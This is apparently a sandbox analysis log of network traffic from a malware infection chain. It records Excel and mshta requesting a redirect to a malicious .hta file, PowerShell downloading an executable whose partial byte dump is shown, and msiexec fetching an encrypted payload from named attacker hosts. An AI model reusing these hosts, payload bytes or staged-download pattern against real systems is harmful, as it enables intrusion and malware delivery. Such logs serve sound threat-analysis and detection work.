                                                        Oct 28, 2024 11:21:30.631494999 CET424INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                        Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                        Oct 28, 2024 11:21:30.631529093 CET1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                        Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                        Oct 28, 2024 11:21:30.631566048 CET1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                        Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                        Oct 28, 2024 11:21:30.631602049 CET424INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                        Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509puxXxeiLEBExHVXcjLJJWKoAOpmFTkshXglSgXaOEc
                                                        Oct 28, 2024 11:21:30.631638050 CET1236INData Raw: 47 74 6d 4b 54 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                        Data Ascii: GtmKT%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                        Oct 28, 2024 11:21:30.631671906 CET212INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                        Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                        Oct 28, 2024 11:21:30.631707907 CET1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                        Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                        Oct 28, 2024 11:21:30.631747007 CET1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                        Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                        Oct 28, 2024 11:21:30.637233973 CET1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                        Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.2249167107.175.113.214803704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 28, 2024 11:21:39.043621063 CET337OUTGET /902/walnext.exe HTTP/1.1
                                                        Accept: */*
                                                        UA-CPU: AMD64
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        Host: 107.175.113.214
                                                        Connection: Keep-Alive
                                                        Oct 28, 2024 11:21:39.711405039 CET1236INHTTP/1.1 200 OK
                                                        Date: Mon, 28 Oct 2024 10:21:39 GMT
                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                        Last-Modified: Mon, 28 Oct 2024 05:07:08 GMT
                                                        ETag: "b4483-6258270c9fdc6"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 738435
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-msdownload
                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad b1 28 81 e9 d0 46 d2 e9 d0 46 d2 e9 d0 46 d2 2a df 19 d2 eb d0 46 d2 e9 d0 47 d2 76 d0 46 d2 2a df 1b d2 e6 d0 46 d2 bd f3 76 d2 e3 d0 46 d2 2e d6 40 d2 e8 d0 46 d2 52 69 63 68 e9 d0 46 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 39 ed 6f 5a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 64 00 00 00 7c 02 00 00 04 00 00 0c 32 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 70 04 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 [TRUNCATED]
                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(FFF*FGvF*FvF.@FRichFPEL9oZd|2@p@4f.textbd `.rdataTh@@.dataU|@.ndata.rsrcfh@@
                                                        Oct 28, 2024 11:21:39.711421967 CET212INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii: U\}t+}FEuHBHPuuu@BSV5BEWPu@eEEPu
                                                        Oct 28, 2024 11:21:39.711440086 CET1236INData Raw: 40 00 8b 7d f0 83 65 f0 00 8b 1d 5c 80 40 00 e9 80 00 00 00 0f b6 46 52 0f b6 56 56 0f af 55 e8 8b cf 2b 4d e8 0f af c1 03 c2 89 4d 10 99 f7 ff 33 d2 8a f0 0f b6 46 51 0f af c1 0f b6 4e 55 0f af 4d e8 03 c1 8b ca 99 f7 ff 0f b6 56 54 0f af 55 e8
                                                        Data Ascii: @}e\@FRVVU+MM3FQNUMVTUFPEEPMd@EEPEPu@uE9}w~Xtev4T@EtU}jWEEP@vXWX@u5L@WEEh Pjh
                                                        Oct 28, 2024 11:21:39.711452007 CET1236INData Raw: f4 42 00 89 88 a0 f4 42 00 e9 16 14 00 00 8b 45 e0 8d 34 85 a0 f4 42 00 33 c0 8b 0e 3b cb 0f 94 c0 23 4d e4 8b 44 85 d8 89 0e e9 00 14 00 00 ff 34 95 a0 f4 42 00 56 e9 90 13 00 00 8b 0d d0 eb 42 00 8b 35 78 82 40 00 3b cb 74 07 52 51 ff d6 8b 45
                                                        Data Ascii: BBE4B3;#MD4BVB5x@;tRQEB;PQj'uP@ajWD;tTj\VC:Eu9]t8@tW?W@;t=uW@uEEF:u9]
                                                        Oct 28, 2024 11:21:39.711463928 CET1236INData Raw: 81 40 00 85 c0 75 7a 8b 45 e0 e9 4c 0f 00 00 ff 15 24 81 40 00 eb ec 33 ff 47 57 e8 a4 10 00 00 68 00 04 00 00 56 50 89 45 08 ff 15 60 81 40 00 85 c0 74 13 39 5d e0 74 13 56 ff 75 08 ff 15 24 81 40 00 85 c0 75 05 89 7d fc 88 1e 88 9e ff 03 00 00
                                                        Data Ascii: @uzEL$@3GWhVPE`@t9]tVu$@u}uSBjU6Y;YUu;|~;sExEjjU}YUYEws$q*@k+g;tDU#3G3;
                                                        Oct 28, 2024 11:21:39.711474895 CET1236INData Raw: 00 ff 75 c4 eb 45 53 e8 e4 0b 00 00 8b f0 56 6a eb e8 d6 31 00 00 56 e8 48 37 00 00 8b f0 3b f3 0f 84 1b 08 00 00 39 5d e0 74 1f 56 e8 a1 44 00 00 39 5d dc 7c 09 50 57 e8 e6 3f 00 00 eb 0b 3b c3 74 07 c7 45 fc 01 00 00 00 56 ff 15 14 81 40 00 e9
                                                        Data Ascii: uESVj1VH7;9]tVD9]|PW?;tEV@&jPeC;EtsW?sjcMEQPjC;EEPj@X@;EjCjECuEuSuUt2EPE
                                                        Oct 28, 2024 11:21:39.711486101 CET1236INData Raw: 40 00 eb 16 6a 22 e8 11 07 00 00 8b 4d e8 d1 f9 51 50 56 e8 c2 07 00 00 8b f8 3b fb 0f 84 86 05 00 00 e9 46 03 00 00 8b 75 e8 8b f8 8b 45 ec 6a 02 89 45 c4 e8 e3 06 00 00 6a 11 89 45 cc e8 d9 06 00 00 6a 02 50 57 c7 45 fc 01 00 00 00 e8 59 07 00
                                                        Data Ascii: @j"MQPV;FuEjEjEjPWEY;EJ3@uj#W;@ujvY@VUXuhWSuJPWuSuu(@u]uhj3E;MEQMVQSP
                                                        Oct 28, 2024 11:21:39.711497068 CET1236INData Raw: c9 ff 2b c8 89 4d e0 74 10 6a 01 e8 16 02 00 00 59 89 55 cc 89 45 dc eb 10 ff 75 e8 8d 46 18 50 e8 1a 37 00 00 80 4e 09 01 8b 45 e0 8b 4d dc 89 0c 86 39 5d e4 0f 84 99 00 00 00 ff 75 c0 e8 b7 e8 ff ff e9 8c 00 00 00 53 e8 d8 01 00 00 83 f8 20 59
                                                        Data Ascii: +MtjYUEuFP7NEM9]uS YU>9]t#9]tPSS`SPW5Q9]tBM:BW6%pBS#Qju@9]tSSu@EB3_^[b)@@@
                                                        Oct 28, 2024 11:21:39.711509943 CET1236INData Raw: 28 14 42 00 ff 15 78 82 40 00 5e c3 55 8b ec 83 ec 28 53 56 33 db 57 89 5d f8 89 5d fc ff 15 90 80 40 00 be 00 6c 43 00 68 00 04 00 00 05 e8 03 00 00 56 53 a3 10 f4 42 00 ff 15 78 80 40 00 6a 03 68 00 00 00 80 56 e8 96 2d 00 00 8b f8 83 ff ff 89
                                                        Data Ascii: (Bx@^U(SV3W]]@lChVSBx@jhV-}=@u@V\CV1V+PhpC1SWt@;,B0BB%~;|WS"=BuzjESP,Eur}ui}
                                                        Oct 28, 2024 11:21:39.711524010 CET1236INData Raw: 20 c6 44 24 14 20 ff 15 a0 80 40 00 ff 15 9c 80 40 00 25 ff ff ff bf 66 3d 06 00 a3 0c f4 42 00 74 11 53 e8 e5 30 00 00 3b c3 74 07 68 00 0c 00 00 ff d0 be 98 82 40 00 56 e8 61 30 00 00 56 ff 15 98 80 40 00 8d 74 06 01 38 1e 75 eb 6a 0a e8 b9 30
                                                        Data Ascii: D$ @@%f=BtS0;th@Va0V@t8uj0j0jB0;tjtB@UD@S@BSD$8h`PSh0Bx@h@hB,@PCPU,=PC"B@uD$"PCt$PJ&P0
                                                        Oct 28, 2024 11:21:39.718637943 CET1236INData Raw: ff 15 14 81 40 00 83 0d 18 a0 40 00 ff e8 28 00 00 00 6a 07 68 00 68 43 00 e8 4b 20 00 00 c3 56 8b 35 34 98 42 00 eb 0a ff 74 24 08 ff 56 04 8b 36 59 85 f6 75 f2 5e c2 04 00 56 8b 35 34 98 42 00 6a 00 e8 d7 ff ff ff 85 f6 74 1a 57 8b fe 8b 36 ff
                                                        Data Ascii: @@(jhhCK V54Bt$V6Yu^V54BjtW6wD@W\@u_%4B^4BH;L$tu@3Vt$Vu@,jj@X@tL$pH4B4B3^SUV5BWjV+3;tPh`C


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.2249163188.114.96.34433344C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-28 10:21:26 UTC439OUTGET /L44VBp?&waterspout=toothsome&washbasin=berserk&beer=unable&attorney=magical&friction=reminiscent&stumbling=needless&vertigo HTTP/1.1
                                                        Accept: */*
                                                        UA-CPU: AMD64
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        Host: qrisni.me
                                                        Connection: Keep-Alive
                                                        2024-10-28 10:21:26 UTC1231INHTTP/1.1 302 Found
                                                        Date: Mon, 28 Oct 2024 10:21:26 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 114
                                                        Connection: close
                                                        cross-origin-embedder-policy: require-corp
                                                        cross-origin-opener-policy: same-origin
                                                        cross-origin-resource-policy: same-origin
                                                        x-dns-prefetch-control: off
                                                        x-frame-options: SAMEORIGIN
                                                        strict-transport-security: max-age=15552000; includeSubDomains
                                                        x-download-options: noopen
                                                        x-content-type-options: nosniff
                                                        origin-agent-cluster: ?1
                                                        x-permitted-cross-domain-policies: none
                                                        referrer-policy: no-referrer
                                                        x-xss-protection: 0
                                                        location: http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta
                                                        vary: Accept, Accept-Encoding
                                                        x-do-app-origin: edb1517e-eb68-4bff-8694-91662c34bef1
                                                        Cache-Control: private
                                                        x-do-orig-status: 302
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FHkBZ%2FgMv3ndG9jcx9uaHJRxgHm0D09E%2FfTjXwxUeCzX8thh4DIDi6NlM2%2BUAfg8dBhKQNLVJz20ulTIsCp9cUit9v660fi5%2F3rvAyZ18bDbOAsmhqEr4yqFuck%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8d9a32ee4daf45e4-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-10-28 10:21:26 UTC191INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 30 38 32 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 30 39 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 32 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 36 38 31 34 38 31 26 63 77 6e 64 3d 32 35 30 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 38 61 63 35 37 66 37 66 30 62 38 65 30 38 30 64 26 74 73 3d 38 34 35 26 78 3d 30 22 0d 0a 0d 0a
                                                        Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1082&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2809&recv_bytes=1021&delivery_rate=2681481&cwnd=250&unsent_bytes=0&cid=8ac57f7f0b8e080d&ts=845&x=0"
                                                        2024-10-28 10:21:26 UTC114INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 37 2e 31 37 35 2e 31 31 33 2e 32 31 34 2f 78 61 6d 70 70 2f 72 64 68 2f 6e 69 63 65 77 6f 72 6b 69 6e 67 74 68 69 6e 67 73 77 69 74 68 67 72 65 61 74 74 68 69 6e 67 73 65 76 65 6e 67 65 74 62 61 63 6b 77 69 74 68 67 6f 6f 64 6e 65 77 73 2e 68 74 61
                                                        Data Ascii: Found. Redirecting to http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.2249165188.114.96.34433612C:\Windows\System32\mshta.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-28 10:21:28 UTC463OUTGET /L44VBp?&waterspout=toothsome&washbasin=berserk&beer=unable&attorney=magical&friction=reminiscent&stumbling=needless&vertigo HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US
                                                        UA-CPU: AMD64
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        Host: qrisni.me
                                                        Connection: Keep-Alive
                                                        2024-10-28 10:21:29 UTC1233INHTTP/1.1 302 Found
                                                        Date: Mon, 28 Oct 2024 10:21:29 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 114
                                                        Connection: close
                                                        cross-origin-embedder-policy: require-corp
                                                        cross-origin-opener-policy: same-origin
                                                        cross-origin-resource-policy: same-origin
                                                        x-dns-prefetch-control: off
                                                        x-frame-options: SAMEORIGIN
                                                        strict-transport-security: max-age=15552000; includeSubDomains
                                                        x-download-options: noopen
                                                        x-content-type-options: nosniff
                                                        origin-agent-cluster: ?1
                                                        x-permitted-cross-domain-policies: none
                                                        referrer-policy: no-referrer
                                                        x-xss-protection: 0
                                                        location: http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta
                                                        vary: Accept, Accept-Encoding
                                                        x-do-app-origin: edb1517e-eb68-4bff-8694-91662c34bef1
                                                        Cache-Control: private
                                                        x-do-orig-status: 302
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hU7P64pg20thZKI%2BsYiU8DV%2BTeE5M2lvJtWTAE%2B4UJtZpx3nSh4tj%2F21uUkX9r4gzpowHik8sF1w5qbE%2BqJY1XU7Uh8nK0n4xGBbUjoMhiGjrE9%2BGRipHkNyr38%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8d9a32ff0a006be9-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-10-28 10:21:29 UTC191INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 32 32 37 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 30 39 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 34 35 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 33 38 39 34 33 38 26 63 77 6e 64 3d 32 35 31 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 37 63 31 34 38 65 38 64 30 64 64 36 31 33 65 39 26 74 73 3d 34 37 32 26 78 3d 30 22 0d 0a 0d 0a
                                                        Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1227&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2809&recv_bytes=1045&delivery_rate=2389438&cwnd=251&unsent_bytes=0&cid=7c148e8d0dd613e9&ts=472&x=0"
                                                        2024-10-28 10:21:29 UTC114INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 37 2e 31 37 35 2e 31 31 33 2e 32 31 34 2f 78 61 6d 70 70 2f 72 64 68 2f 6e 69 63 65 77 6f 72 6b 69 6e 67 74 68 69 6e 67 73 77 69 74 68 67 72 65 61 74 74 68 69 6e 67 73 65 76 65 6e 67 65 74 62 61 63 6b 77 69 74 68 67 6f 6f 64 6e 65 77 73 2e 68 74 61
                                                        Data Ascii: Found. Redirecting to http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.2249168199.217.106.2264432100C:\Windows\SysWOW64\msiexec.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-28 10:22:52 UTC182OUTGET /pkeZmGiUuTK20.bin HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: www.bookinginfo.asia
                                                        Cache-Control: no-cache
                                                        2024-10-28 10:22:52 UTC223INHTTP/1.1 200 OK
                                                        Date: Mon, 28 Oct 2024 10:22:52 GMT
                                                        Server: Apache
                                                        Last-Modified: Mon, 28 Oct 2024 05:05:32 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 240192
                                                        Connection: close
                                                        Content-Type: application/octet-stream
                                                        2024-10-28 10:22:52 UTC7969INData Raw: ae 4d 33 45 f3 ad 06 7c 27 4e f8 3e 58 69 af 38 be 8b 4c 26 56 60 63 14 71 f5 0d e1 c5 f9 60 3b 97 c1 d5 16 38 89 f6 38 11 21 c2 a2 1a 74 ea b0 02 fa 4f 39 f4 ee 0d 47 5d 70 0e 56 32 78 3a 05 d2 c3 e2 18 4c 5b ee b4 45 35 3c 4a 72 7c 4c c5 87 a9 2d 1f 3f d3 1e 62 5a b2 16 61 47 fb 81 c2 de 42 c9 d2 a2 78 fc d5 a6 bd 15 9d 0c fe 11 b5 df 74 44 3e f6 ab 70 49 1a 71 85 3b 8f ab 18 c5 90 3a 43 7d fa 60 9a b1 a1 50 48 76 98 af a9 5e 4e ca 98 88 b6 9e cb e0 8b d1 e2 74 72 86 a1 f1 72 78 69 1d 61 36 e2 be 3a 7b 11 ec d2 b0 16 1a 67 c3 63 67 5c ce ee b5 23 0e bc 55 01 f1 9e 96 46 35 70 2c ad 0d 65 d1 95 cf dc bc 67 38 fb 3e 19 d0 cb ca 3a b3 a9 65 d8 e2 31 c9 c1 68 c7 6b d5 c7 1b 69 1f 2a c1 ba cf f1 09 6d 37 8d 73 62 ab 9f af 08 2e e7 81 04 4c 00 bc 1e 27 46 74
                                                        Data Ascii: M3E|'N>Xi8L&V`cq`;88!tO9G]pV2x:L[E5<Jr|L-?bZaGBxtD>pIq;:C}`PHv^Ntrrxia6:{gcg\#UF5p,eg8>:e1hki*m7sb.L'Ft
                                                        2024-10-28 10:22:52 UTC8000INData Raw: 07 fc 73 fa fb bf 07 0e 42 59 01 f1 be 97 16 70 70 5e fa 0c 66 a1 90 dd 94 da 67 38 05 30 18 d0 cb 34 d6 b2 ab 44 d5 e3 3a c9 3f c9 fd 73 d5 cf 1b 97 13 2a c1 9a e5 4e 0a 6d 1f 81 73 62 a1 fd 8c 0f 2e e7 c1 fa 42 21 bc 1e d9 48 75 a3 60 83 d1 6b 0b 8e 77 6f e9 23 9f 1a 26 73 97 fa 7a b9 f9 a4 0e 63 54 50 91 d6 28 43 0a 08 a7 37 6a f4 5c b6 17 6c c5 c9 69 a8 05 04 20 41 7f 24 a2 26 92 32 2c 02 1b f9 6c e7 4b 1b fb 64 d8 5e b3 94 3d cf d9 6b c1 1c 92 68 1f 51 19 fb f2 d6 1c 42 b4 67 dc 4b 0e 3f 3e 30 a7 ff e4 80 b8 2d 8d a7 48 1c 42 f9 75 9e 75 16 45 af 10 26 7b 85 91 d7 e5 46 af 6e b3 51 d9 d9 80 f8 12 7b 82 6f e5 37 d6 9c 4c 9d c0 a7 ab 78 01 18 02 4f d5 3e 84 aa 2a 3c 80 2e 6c 23 85 b1 f3 1e 14 ad f3 be f3 1f a4 d4 f4 cc 05 50 8b 56 b9 8b 74 7f 6d 0e 69
                                                        Data Ascii: sBYpp^fg804D:?s*Nmsb.B!Hu`kwo#&szcTP(C7j\li A$&2,lKd^=khQBgK?>0-HBuuE&{FnQ{o7LxO>*<.l#PVtmi
                                                        2024-10-28 10:22:52 UTC8000INData Raw: 9c 4c bd 65 a9 ab 78 ff e7 37 6d d5 1e 82 54 23 3c 7e 0a 2e 44 85 b1 f7 12 be a9 f3 ca e2 15 a5 d4 fe 91 76 50 8b 52 67 d9 74 7f 6d 0e 6b 8d c4 76 c0 8a 68 86 6f 3a a7 70 08 72 ea 9b fc 31 2f c5 2c 7e d0 19 2f 00 2e a6 3a 0f 55 e3 2e da 7c ab 5d 87 1d 5f ff 20 63 73 9b 4b 31 08 51 ba e1 e2 6b 36 ad 24 7d 69 65 29 d0 b5 95 61 39 81 71 45 91 d8 21 5c c7 79 be cf ed 54 57 cb bb b0 17 36 ec 91 e5 7b 4f 34 e3 d2 f9 36 e1 93 56 f3 65 91 7b ef 2b 71 4e 76 c0 3a 97 4d 07 f1 65 23 2c 3f 6c 31 fa e6 f9 9c cb 53 fe 3a 9f 0b 0b d1 7b b4 74 a0 94 96 d3 9f 66 20 1e d3 9d 15 bf d8 6c d4 5d c0 11 da a0 ae e7 04 15 67 95 15 7e 0f 81 f4 ad 6e e9 c0 74 fd 79 03 ad ef 5e d6 41 6f 37 f5 f3 72 60 b4 0c 32 a2 a1 f9 3a 15 29 62 ae ab 05 72 46 3d b4 da 6c c3 0f df 16 01 1b 88 55
                                                        Data Ascii: Lex7mT#<~.DvPRgtmkvho:pr1/,~/.:U.|]_ csK1Qk6$}ie)a9qE!\yTW6{O46Ve{+qNv:Me#,?l1S:{tf l]g~nty^Ao7r`2:)brF=lU
